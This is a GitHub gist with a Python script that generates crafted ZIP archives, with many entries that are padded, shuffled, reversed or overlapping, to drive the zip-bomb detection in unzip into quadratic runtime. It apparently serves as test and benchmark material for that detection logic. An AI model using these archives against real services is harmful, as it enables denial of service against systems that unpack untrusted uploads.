Skip to content

Instantly share code, notes, and snippets.

@maksverver
Last active April 20, 2025 16:47
Show Gist options
  • Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Python script to generate zip files which make the zip bomb detection logic in unzip run in quadratic time
#!/usr/bin/env python3
# Generates zip files that trigger quadratic runtime in unzip with zip bomb
# detection enabled.
import zlib
from random import shuffle, randrange
from struct import pack
def MakeBytes(data):
    """Return *data* as a ``bytes`` object.

    ``str`` input is encoded as UTF-8; ``bytes`` input is returned unchanged.

    Raises:
        TypeError: if *data* is neither ``str`` nor ``bytes``.
    """
    if isinstance(data, str):
        return data.encode('utf-8')
    if not isinstance(data, bytes):
        # Raise explicitly rather than `assert`, so the check is not
        # stripped when Python runs with -O.
        raise TypeError(f'expected str or bytes, got {type(data).__name__}')
    return data
def CreateFileHeaders(name, data, offset, extra=b'', comment=b''):
    """Build the two ZIP headers describing one stored (uncompressed) file.

    Args:
        name: file name (str or bytes; str is encoded as UTF-8).
        data: file contents (str or bytes). Only its length and CRC-32 are
            used here; the contents themselves are not part of either header.
        offset: value written into the central directory header's
            "offset of local header" field.
        extra: extra field bytes, appended to both headers.
        comment: file comment, appended to the central directory header only.

    Returns:
        A ``(local_file_header, central_directory_file_header)`` tuple of
        bytes, each including its trailing variable-length fields.

    Raises:
        struct.error: if a value does not fit its fixed-width field
            (for example an offset that needs more than 32 bits).
    """
    name = MakeBytes(name)
    data = MakeBytes(data)
    extra = MakeBytes(extra)
    comment = MakeBytes(comment)

    local_file_sig = 0x04034b50
    central_directory_sig = 0x02014b50
    gen_ver = min_ver = 10
    flags = 0
    comp = 0  # compression method 0: the data is stored as-is
    mtime = 0
    mdate = 0
    crc32 = zlib.crc32(data)
    # Stored entries have identical compressed and uncompressed sizes.
    csize = len(data)
    usize = len(data)
    name_len = len(name)
    extra_len = len(extra)
    comment_len = len(comment)
    disk_no = 0
    int_attr = 0
    ext_attr = 0

    # 30 fixed bytes followed by the name and the extra field.
    local_file_header = pack(
        '<IHHHHHIIIHH',
        local_file_sig, min_ver, flags, comp, mtime, mdate,
        crc32, csize, usize, name_len, extra_len,
    ) + name + extra

    # 46 fixed bytes followed by the name, the extra field and the comment.
    central_directory_file_header = pack(
        '<IHHHHHHIIIHHHHHII',
        central_directory_sig, gen_ver, min_ver, flags, comp, mtime, mdate,
        crc32, csize, usize, name_len, extra_len, comment_len,
        disk_no, int_attr, ext_attr, offset,
    ) + name + extra + comment

    return (local_file_header, central_directory_file_header)
def CreateEndOfCentralDirectoryRecord(entries, offset, comment=b''):
    """Build the (non-zip64) end-of-central-directory record.

    Args:
        entries: sequence of serialized central directory headers (bytes).
            Their count and combined length fill the record's entry-count
            and directory-size fields.
        offset: file offset at which the central directory starts.
        comment: archive comment (str or bytes), appended to the record.

    Returns:
        The record as bytes: 22 fixed bytes followed by the comment.

    Raises:
        struct.error: if the directory size or offset does not fit in
            32 bits, or the comment length does not fit in 16 bits.
    """
    sig = 0x06054b50
    current_disk = start_disk = 0
    # The count fields are 16 bits wide, so larger counts are clamped
    # to 65535.
    entries_on_disk = num_entries = min(len(entries), 65535)
    total_size = sum(len(entry) for entry in entries)
    comment = MakeBytes(comment)
    comment_len = len(comment)
    return pack(
        '<IHHHHIIH',
        sig, current_disk, start_disk, entries_on_disk, num_entries,
        total_size, offset, comment_len,
    ) + comment
def CreateZip64EndOfCentralDirectoryRecord(entries, offset):
    """Build the zip64 end-of-central-directory record.

    Args:
        entries: sequence of serialized central directory headers (bytes).
            Their count and combined length fill the record's entry-count
            and directory-size fields.
        offset: file offset at which the central directory starts.

    Returns:
        The 56-byte record as bytes.
    """
    sig = 0x06064b50
    gen_ver = min_ver = 45
    current_disk = 0
    start_disk = 0
    # The size field excludes the 4-byte signature and the 8-byte size field
    # itself: 56 - 12 = 44.
    record_size = 44
    entries_on_disk = num_entries = len(entries)
    total_size = sum(len(entry) for entry in entries)
    return pack(
        '<IQHHIIQQQQ',
        sig, record_size, gen_ver, min_ver, current_disk, start_disk,
        entries_on_disk, num_entries, total_size, offset,
    )
def CreateZip64EndOfCentralDirectoryLocator(offset):
    """Build the zip64 end-of-central-directory locator.

    Args:
        offset: file offset of the zip64 end-of-central-directory record.

    Returns:
        The 20-byte locator as bytes, describing a single-disk archive
        (disk number 0, total disk count 1).
    """
    sig = 0x07064b50
    disk_no = 0
    disk_count = 1
    return pack('<IIQI', sig, disk_no, offset, disk_count)
def GenerateTestCase(zip_filename, num_files, padding=None, transform=None, overlap=False):
    """Write a ZIP archive of empty files named '0', '1', ... to *zip_filename*.

    Args:
        zip_filename: path of the archive to create (overwritten if present).
        num_files: number of empty files to add.
        padding: optional bytes written after every file, leaving a gap
            between consecutive entries.
        transform: optional callable applied to the list of central directory
            headers; it must reorder the list in place (for example
            ``random.shuffle`` or ``list.reverse``).
        overlap: if true, append an extra entry 'x' whose central directory
            header points at a random earlier offset, which makes the
            archive invalid.

    Raises:
        ValueError: if *overlap* is true but *num_files* is not positive;
            there would be no earlier offset to point at.
    """
    if overlap and num_files <= 0:
        # Fail before creating the output file rather than part-way through
        # with an opaque "empty range" error from randrange().
        raise ValueError('overlap=True requires num_files > 0')

    with open(zip_filename, 'wb') as f:
        entries = []

        def AddFile(name, data, /, offset=None):
            # Write the local header and data at the current position, and
            # queue the central directory header. That header records
            # `offset`, which defaults to the position actually written.
            if offset is None:
                offset = f.tell()
            data = MakeBytes(data)
            local_header, central_header = CreateFileHeaders(name, data, offset)
            entries.append(central_header)
            f.write(local_header)
            f.write(data)

        for i in range(num_files):
            AddFile(f'{i}', '')
            if padding:
                f.write(padding)

        # This is important to trigger the worst case complexity.
        if transform:
            transform(entries)

        if overlap:
            # Make zip file invalid by adding an entry at the wrong offset.
            # This should trigger zip bomb detection:
            AddFile('x', '', offset=randrange(0, f.tell()))

        # Write central directory followed by end-of-central-directory record.
        central_directory_offset = f.tell()
        central_directory = b''.join(entries)
        f.write(central_directory)

        if len(entries) >= 65535:
            # The 16-bit entry count cannot represent this many entries, so
            # the zip64 record and its locator must precede the regular
            # end-of-central-directory record.
            zip64_eocdr_offset = f.tell()
            f.write(CreateZip64EndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
            f.write(CreateZip64EndOfCentralDirectoryLocator(offset=zip64_eocdr_offset))

        f.write(CreateEndOfCentralDirectoryRecord(entries, offset=central_directory_offset))
if __name__ == '__main__':
    # In-place list reversal, usable as a `transform` callback.
    reverse = list.reverse

    # Normal zip file with no padding between files. This doesn't
    # trigger quadratic runtime because adjacent spans get merged.
    GenerateTestCase('many-files-64k.zip', 65534)

    # Invalid zip file where file entries overlap:
    GenerateTestCase('many-files-64k-overlap.zip', 65534, overlap=True)

    # Zip file with no padding between files, but with shuffled entries,
    # which triggers quadratic runtime.
    GenerateTestCase('many-files-64k-shuffled.zip', 65534, transform=shuffle)

    # Zip file with padding between files. This uses linear memory, but doesn't
    # trigger quadratic runtime because new entries are added at the end of the
    # buffer which uses exponential resizing.
    GenerateTestCase('many-files-64k-padded.zip', 65534, padding=bytes(1))

    # Zip file with padding between files and entries in reverse, which triggers
    # worst-case behavior.
    GenerateTestCase('many-files-64k-padded-reversed.zip', 65534, padding=bytes(1), transform=reverse)

    # Padded zip file with 1 million entries, shuffled rather than reversed.
    GenerateTestCase('many-files-1m-padded-shuffled.zip', 10**6, padding=bytes(1), transform=shuffle)

    # Same as the previous case, but with overlap, which should trigger zip
    # bomb detection.
    GenerateTestCase('many-files-1m-padded-shuffled-overlap.zip', 10**6, padding=bytes(1), transform=shuffle, overlap=True)

    # Some larger cases for benchmarking:
    GenerateTestCase('many-files-1m-padded-reversed.zip', 1 * 10**6, padding=bytes(1), transform=reverse)
    GenerateTestCase('many-files-2m-padded-reversed.zip', 2 * 10**6, padding=bytes(1), transform=reverse)
    GenerateTestCase('many-files-3m-padded-reversed.zip', 3 * 10**6, padding=bytes(1), transform=reverse)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment